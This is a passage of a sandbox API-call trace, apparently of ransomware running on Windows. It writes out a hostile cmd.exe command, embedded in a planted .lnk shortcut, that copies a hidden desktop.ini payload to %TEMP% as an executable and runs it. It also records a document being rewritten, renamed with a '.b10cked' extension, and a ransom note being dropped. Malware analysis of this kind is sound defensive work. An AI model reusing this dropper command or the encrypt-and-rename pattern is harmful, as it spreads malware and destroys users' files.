lpWideCharStr="\x42\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x68\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x66\xbed6\xfbf8\x12\x37c4\x1c5f\x44cd\xd116\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2fe7\x7728\xb109\x7720") returned 1 [0233.410] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.410] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0233.410] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0233.410] CharUpperBuffW (in: lpsz="explorer.exe \"RIbq701A98461 y-C _\" & type \"RIbq701A98461 y-C _\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x77 | out: lpsz="EXPLORER.EXE \"RIBQ701A98461 Y-C _\" & TYPE \"RIBQ701A98461 Y-C _\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") 
returned 0x77 [0233.410] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0233.411] CharUpperBuffW (in: lpsz="explorer.exe \"RIbq701A98461 y-C _\" & type \"RIbq701A98461 y-C _\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x78 | out: lpsz="EXPLORER.EXE \"RIBQ701A98461 Y-C _\" & TYPE \"RIBQ701A98461 Y-C _\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x78 [0233.411] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0233.411] CoInitialize (pvReserved=0x0) returned 0x0 [0233.411] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0233.412] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0233.412] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0233.412] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0233.413] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"RIbq701A98461 y-C _\" & type \"RIbq701A98461 y-C _\\desktop.ini\" > \"%TEMP%\\3D4CoBhf.exe\" && \"%TEMP%\\3D4CoBhf.exe\"") returned 0x0 [0233.413] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0233.413] 
ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0233.413] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0233.413] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _.lnk", fRemember=0) returned 0x0 [0233.471] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0233.471] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0233.471] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0233.471] CoUninitialize () [0233.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.471] ReleaseMutex (hMutex=0xf8) returned 1 [0233.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.471] ReleaseMutex (hMutex=0xf8) returned 1 [0233.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.472] ReleaseMutex (hMutex=0xf8) returned 1 [0233.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.472] ReleaseMutex (hMutex=0xf8) returned 1 [0233.472] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\rd4bMPAMmCyKiYpJrFwO.ots" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\rd4bmpammcykiypjrfwo.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29026117617) returned 1 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1a00 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1518 [0233.473] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1a00 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1a00 [0233.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.475] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xcff, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xcff, lpOverlapped=0x0) returned 1 [0233.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.475] WriteFile (in: hFile=0x1b4, lpBuffer=0x127c928*, nNumberOfBytesToWrite=0xcff, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127c928*, lpNumberOfBytesWritten=0x12ec1c*=0xcff, lpOverlapped=0x0) returned 1 [0233.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-3327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd01 [0233.475] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xcff, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xcff, lpOverlapped=0x0) returned 1 [0233.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-3327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd01 [0233.475] WriteFile (in: hFile=0x1b4, 
lpBuffer=0x127c928*, nNumberOfBytesToWrite=0xcff, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127c928*, lpNumberOfBytesWritten=0x12ec1c*=0xcff, lpOverlapped=0x0) returned 1 [0233.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rd4bMPAMmCyKiYpJrFwO.ots", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0233.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rd4bMPAMmCyKiYpJrFwO.ots", cchWideChar=24, lpMultiByteStr=0x132f7bc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rd4bMPAMmCyKiYpJrFwO.ots", lpUsedDefaultChar=0x0) returned 24 [0233.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1a00 [0233.479] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.479] CloseHandle (hObject=0x1b4) returned 1 [0233.480] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\rd4bMPAMmCyKiYpJrFwO.ots", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS") returned 0x36 [0233.480] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0233.481] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked\"", 
lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xe4, dwThreadId=0xe8)) returned 1 [0233.484] CloseHandle (hObject=0x120) returned 1 [0233.484] CloseHandle (hObject=0x1b4) returned 1 [0233.484] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0233.484] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", cchLength=0x6c | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\") returned 0x6c [0233.484] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\", cchCount2=108) returned 1 [0233.484] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0233.484] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: 
lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0233.484] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0233.484] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0233.484] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0233.484] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0233.484] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0233.485] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0233.485] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0233.485] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 
lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xec, dwThreadId=0xba0)) returned 1 [0233.486] CloseHandle (hObject=0x120) returned 1 [0233.486] CloseHandle (hObject=0x1b4) returned 1 [0233.486] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf")) returned 0x20 [0233.486] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.486] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.486] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.487] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.487] ReleaseMutex (hMutex=0xf8) returned 1 [0233.487] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.487] ReleaseMutex (hMutex=0xf8) returned 1 [0233.487] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.487] ReleaseMutex (hMutex=0xf8) returned 1 [0233.487] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.487] ReleaseMutex (hMutex=0xf8) returned 1 [0233.487] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\ieMCxg.pps" (normalized: 